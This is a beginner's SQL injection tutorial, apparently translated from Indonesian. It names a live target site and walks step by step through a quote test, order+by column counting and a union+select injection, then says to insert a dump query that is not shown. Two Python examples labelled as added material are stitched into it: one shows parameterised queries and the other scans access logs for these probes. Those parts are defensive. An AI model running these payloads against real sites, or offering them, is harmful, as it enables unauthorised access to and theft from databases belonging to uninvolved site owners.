SQL INJECTION TUTORIAL FOR BEGINNERS
SQL INJECTION for Beginners
Assalamualaikum
What's up bro, back again with me, MrJack. This time I'm going to share some SQL injection material for beginners :v
OK, without further ado, let's get straight into it :V
What You Need
- Dork
- Dios
- Determination
- Chrome + data quota + phone
The dorks
Dork : SQL INJECTION
Those are the dorks. Build on them using that clever brain of yours; you're grown up, surely you can manage.. if you can't do dorking, don't bother hacking awoakowkw :V
Moving on, I have a live target for you to try
Kansascitynova.org/news.php?id=42
First, how to tell whether a site is vulnerable to SQL injection: easy, just add a single quote ' right after the parameter
For example, like this
Kansascitynova.org/news.php?id=42'

If the page's appearance changes like that, as in the image above, it means the site is vulnerable to SQL injection
Next
Use order+by+1--+-
At 1 there is no error yet, so keep raising the number until an error appears
order+by+1--+- No error
order+by+5--+- No error
order+by+8--+- Error
The error appears at 8, so do a union+select up to 7. Why 7? Because the error is at 8, which means the query only has 7 columns
Kansascitynova.org/news.php?id=42'union+select+1,2,3,4,5,6,7--+- like that..
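Why the quote and order+by probes above change the page, and what stops them, as an added example (not from the original post): it uses Python's sqlite3 as a stand-in for the PHP/MySQL backend, and the 7-column news table and the function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed 7-column table standing in for whatever news.php queries.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, "
               "author TEXT, created TEXT, tags TEXT, views INTEGER)")
    db.execute("INSERT INTO news VALUES (42, 'Launch', 'text', 'staff', '2020-01-01', 'x', 0)")
    return db

def fetch_news_vulnerable(db, raw_id):
    # 'Before': the parameter is pasted between quotes in the SQL text, so a
    # stray ' or an appended ORDER BY becomes part of the statement.
    sql = "SELECT * FROM news WHERE id = '" + raw_id + "'"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc  # this is what makes the page look different

def fetch_news_safe(db, raw_id):
    # 'After': accept only a short run of ASCII digits, then bind the value as
    # a parameter so it can never be parsed as SQL.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 18):
        return []
    return db.execute("SELECT * FROM news WHERE id = ?", (int(raw_id),)).fetchall()

# Probe values from the walkthrough, URL-decoded (+ is a space).
PROBES = ["42'", "42' order by 7-- -", "42' order by 8-- -"]

def compare():
    db = make_db()
    return [(p, fetch_news_vulnerable(db, p), fetch_news_safe(db, p)) for p in PROBES]

if __name__ == "__main__":
    for probe, before, after in compare():
        print(repr(probe), "| vulnerable:", before, "| safe:", after)
```

With the bound parameter, none of the probes produces an error or a row, so the column count is never disclosed.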

The "magic number" that shows up on the page is 2, so put the Dios in place of that 2
Here are the Dios
And there, it's injected, right?
An example looks like this
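For whoever runs the site, every stage of this walkthrough (the order+by probes, the union+select, the information_schema dump hidden in /*!50000...*/ comments) is visible in the web server's access log. An added example, not from the original post: a Python scan over constructed log lines; the log format, IPs and paths are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Stages of the walkthrough, matched after URL-decoding and comment stripping.
STAGES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema dump", re.compile(r"\binformation_schema\b", re.I)),
    ("server fingerprint", re.compile(r"@@\w+|\b(?:version|database|user)\s*\(", re.I)),
    ("comment terminator", re.compile(r"--(?:\s|$)")),
]
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed requests (documentation IP ranges, hypothetical paths).
_REQUESTS = [
    ("192.0.2.10", "/news.php?id=42"),
    ("192.0.2.10", "/search.php?q=order+by+mail"),
    ("198.51.100.7", "/news.php?id=42'"),
    ("198.51.100.7", "/news.php?id=42'order+by+8--+-"),
    ("198.51.100.7", "/news.php?id=42%27union+select+1,version/**_**/(),3,4,5,6,7--+-"),
    ("198.51.100.7", "/news.php?id=42'/*!50000union*/+select+1,2,3,4,5,6,7"
                     "+from+/*!50000information_schema.columns*/--+-"),
]
SAMPLE_LOG = ['%s - - [01/Jan/2024:10:00:00 +0000] "GET %s HTTP/1.1" 200 512' % r
              for r in _REQUESTS]

def normalise(query):
    text = unquote_plus(query)  # %27 -> ' and + -> space
    # MySQL versioned comments execute their body: /*!50000select*/ -> select
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.S)
    # Plain comments used as separators: /**/ and /**_**/ -> space
    return re.sub(r"/\*.*?\*/", " ", text, flags=re.S)

def scan(lines):
    """Return {client_ip: sorted stage names seen in that client's query strings}."""
    hits = {}
    for line in lines:
        m = LINE.match(line)
        if not m or "?" not in m.group(2):
            continue
        query = normalise(m.group(2).split("?", 1)[1])
        for name, rx in STAGES:
            if rx.search(query):
                hits.setdefault(m.group(1), set()).add(name)
    return {ip: sorted(stages) for ip, stages in hits.items()}

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(ip, stages)
```

The benign `q=order+by+mail` search is not flagged because the probe signature requires a column number after `order by`.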
OK, that's all for the SQL INJECTION FOR BEGINNERS material. IF THERE ARE ANY MISTAKES IN THE ARTICLE ABOVE, I APOLOGIZE, GO EASY ON ME, I'M A BEGINNER